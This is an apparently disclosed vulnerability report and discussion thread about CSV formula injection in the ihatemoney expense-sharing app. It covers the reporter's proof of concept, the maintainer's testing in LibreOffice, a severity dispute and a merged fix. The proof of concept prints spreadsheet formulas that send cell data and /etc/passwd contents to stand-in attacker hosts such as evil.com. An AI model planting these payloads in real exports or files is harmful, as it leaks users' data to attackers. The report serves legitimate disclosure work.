Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in spiral-project/ihatemoney

Valid

Reported on

May 7th 2022


Description

Formula Injection/CSV Injection in "For what?" , "For whom?" & "How much?" due to Improper Neutralization of Formula Elements in CSV File.

Proof of Concept

1.Visit https://ihatemoney.org/ and start your demo application then click on add new bill at the top right. In the field of "what" insert the below payloads.

2.Payloads:-

=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")

or

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc") // & Start your python server or Netcat listener.

3.Then Go to the settings at the right top option and scroll to the bottom having download the project's data feature

4.Select "CSV" in "Format" to download.

5 . Open the downloaded CSV and click on POC and Error fetching info: Click me to resolve. user will get redirected to evil.com.

PoC video

https://drive.google.com/file/d/1ApQhaTIazCqZw1E8i3lOCV4IKkgNBX49/view?usp=sharing

Impact

Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.

References

We are processing your report and will contact the spiral-project/ihatemoney team within 24 hours. 21 days ago
We have contacted a member of the spiral-project/ihatemoney team and are waiting to hear back 20 days ago
spiral-project/ihatemoney maintainer
20 days ago

Maintainer


I tried this and the output CSV contained:

"=LIEN.HYPERTEXTE(""http://evil.com?x=""; ""hello"")"
"=HYPERLINK(""http://evil.com?x=""&A3&"",""&B3&""[CR]"",""Error fetching info: Click me to resolve."")"

Formulae don't trigger any link in LibreOffice nor in Calligra. I even tried with =ACOS(0,12) and opening it in LibreOffice results in the formula text being shown. In Calligra, the cell is displayed empty. I don't have any other spreadsheet editor to test, but I guess that this is related to CSV loading in Google Docs, so for me, it's invalid.

Tarun Garg
20 days ago

Researcher


Hi, @admin @maintainer it's completely working as I have tested it in LibreOffice. So attaching the zip file containing CSV file and POC video performed in LibreOffice https://drive.google.com/file/d/19eP60acGZYvXBU2hWjzFFOWpDqOrQOj1/view?usp=sharing Please recheck and confirm as it's working in LibreOffice and Google Excel sheet.

Tarun Garg
20 days ago

Researcher


Here you can see both payload =7+7 and =HYPERLINK("http://evil.com","Click for Report") working fine

Tarun Garg
20 days ago

Researcher


POC video and CSV file

=7+7
=HYPERLINK("http://evil.com","Click for Report")
spiral-project/ihatemoney maintainer
20 days ago

Maintainer


OK, so as shown in https://plik.root.gg/file/Lx42qjil4dwYIE1J/Y1mJEF00TuXbYNwS/Peek%2008-05-2022%2016-30.mp4 I've had "Evaluate formulae" unchecked, but I don't know if it was the default. However, is there a standard way to escape formulae in exported CSV?

Tarun Garg
20 days ago

Researcher


@maintainer It seems like it's not working with "LibreOffice 7.3.3.2", it seems like LibreOffice has applied some security major about CSV injection for this version. But other versions are still executing like just showed in the POC video which is by default in ubuntu 20.04 (most recommended Linux) as the application is working as an agent. Please check this Reference report for further impact. Reference Report

Tarun Garg
20 days ago

Researcher


However, I'm not sure about such feature of "Evaluate formulae" as I haven't changed anything. But as it's also executing in google excel, So application is surely vulnerable.

For standard way to escape formulae in exported CSV, please check the provided reference report. They have validated the report and applied the fixes as well.

Tarun Garg
17 days ago

Researcher


@admin @maintainer any update on this report

We have sent a follow up to the spiral-project/ihatemoney team. We will try again in 7 days. 17 days ago
spiral-project/ihatemoney maintainer modified the Severity from Critical to Low 14 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
spiral-project/ihatemoney maintainer validated this vulnerability 14 days ago
Tarun Garg has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
spiral-project/ihatemoney maintainer confirmed that a fix has been merged on 042b33 14 days ago
The fix bounty has been dropped
Tarun Garg
14 days ago

Researcher


@maintainer @admin Can you please go ahead and assign a CVE for this vulnerability.

Tarun Garg
13 days ago

Researcher


Also @admin @maintainer The Severity of this report is not low you can see here it mentioned https://nvd.nist.gov/vuln/detail/CVE-2022-22121 Base Score: 8.0 HIGHVector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Jamie Slome
12 days ago

Admin


We do not currently automatically assign CVEs against Low or None reports. If the maintainer provides us with a CVSS vector string, we will happily assign and publish a CVE.

The severity assessment is solely up to the maintainer, and we do not take a position on this.

to join this conversation